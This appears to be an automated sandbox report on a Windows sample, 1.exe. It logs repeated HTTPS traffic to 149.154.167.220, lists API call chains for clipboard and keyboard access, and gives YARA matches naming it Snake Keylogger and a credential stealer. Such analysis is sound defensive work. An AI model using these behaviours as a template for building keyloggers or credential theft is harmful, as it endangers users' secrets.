                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49676
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49674
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49671
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49635 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49652 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49638 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49641 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49647 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49663
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49662
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49661
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49660
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49653 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49630 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49644 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49627 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49659
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49658
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49657
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49650 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49656
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49655
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49654
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49653
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49652
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49651
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49650
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49633 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49636 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49649
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49648
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49647
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49646
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49645
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49644
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49651 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49643
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49642
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49641
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49640
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49639 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49639
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49638
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49637
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49636
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49642 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49635
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49634
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49633
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49632
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49631
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49648 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49630
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49656 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49631 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49662 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49659 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49629
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49645 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49628
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49628 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49627
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49642 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49643 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49649 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49650 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49651 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49652 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49653 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49654 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49655 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49656 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49657 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49658 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49659 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49660 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49661 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49662 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49663 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49671 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49672 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49673 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49674 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49676 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49680 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49682 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49683 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49695 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49697 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49723 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49741 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49743 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49747 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0046C604 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0046C604
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0046C604 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0046C604
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0044496C GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,PostMessageW,0_2_0044496C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 8304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004278590_2_00427859
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0040F8900_2_0040F890
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004271610_2_00427161
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0042397B0_2_0042397B
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00409A400_2_00409A40
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004212BE0_2_004212BE
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00411B630_2_00411B63
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0047CBF00_2_0047CBF0
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041A46B0_2_0041A46B
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004465660_2_00446566
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00423EBF0_2_00423EBF
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041D7500_2_0041D750
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00424F700_2_00424F70
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_0041AF0D0_2_0041AF0D
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_004037E00_2_004037E0
                    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_00A936200_2_00A93620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222D2781_2_0222D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_022253701_2_02225370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222C1461_2_0222C146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222C7381_2_0222C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222C4681_2_0222C468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222CA081_2_0222CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_022269A01_2_022269A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222E9881_2_0222E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222CFA91_2_0222CFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02226FC81_2_02226FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222CCD81_2_0222CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02229DE01_2_02229DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02223AA11_2_02223AA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222E97A1_2_0222E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0222F98C1_2_0222F98C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_022239EE1_2_022239EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_022229EC1_2_022229EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02223E091_2_02223E09
                    Source: C:\Users\user\Desktop\1.exeCode function: String function: 00445975 appears 65 times
                    Source: C:\Users\user\Desktop\1.exeCode function: String function: 0041718C appears 38 times
                    Source: 1.exe, 00000000.00000003.1353782676.0000000003F7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1.exe
                    Source: 1.exe, 00000000.00000003.1355151388.0000000003E23000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1.exe
                    Source: 1.exe, 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 1.exe
                    Source: 1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.RegSvcs.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.1.exe.3c60000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.1.exe.3c60000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.3807703766.0000000000142000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000000.00000002.1357027294.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: Process Memory Space: 1.exe PID: 8280, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
